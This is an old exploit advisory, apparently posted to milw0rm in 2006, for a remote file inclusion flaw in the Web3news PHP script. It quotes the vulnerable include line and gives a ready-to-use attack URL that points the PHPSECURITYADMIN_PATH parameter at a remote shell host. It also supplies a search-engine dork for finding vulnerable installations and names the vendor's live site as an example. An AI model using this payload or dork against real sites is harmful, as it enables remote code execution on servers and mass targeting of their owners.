38 lines
No EOL
1.4 KiB
Text
38 lines
No EOL
1.4 KiB
Text
#==============================================================================================
|
|
#Web3news <= v0.95 (PHPSECURITYADMIN_PATH) Remote File Inclusion Exploit
|
|
#===============================================================================================
|
|
#
|
|
#Critical Level : Dangerous
|
|
#
|
|
#Venedor site : http://www.web3king.com/web3news
|
|
#
|
|
#Version : All Versions
|
|
#
|
|
#================================================================================================
|
|
#Bug in : security/include/_class.security.php
|
|
#
|
|
#Vlu Code :
|
|
#--------------------------------
|
|
# <?
|
|
# include $PHPSECURITYADMIN_PATH."lang/".$lang.".lang.php";
|
|
#
|
|
#
|
|
#================================================================================================
|
|
#
|
|
#Exploit :
|
|
#--------------------------------
|
|
#
|
|
#http://sitename.com/[Script Path]/security/include/_class.security.php?PHPSECURITYADMIN_PATH=http://SHELLURL.COM?
|
|
#
|
|
#Example : http://www.web3king.com/web3news/ ======> Vendor site
|
|
#
|
|
#DOrk : allinurl : /web3news/
|
|
#================================================================================================
|
|
#Discoverd By : SHiKaA
|
|
#
|
|
#Conatact : SHiKaA-[at]hotmail.com
|
|
#
|
|
#GreetZ : Str0ke KACPER Rgod Timq XoRon MDX Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf) | cyper-worrior
|
|
==================================================================================================
|
|
|
|
# milw0rm.com [2006-08-28] |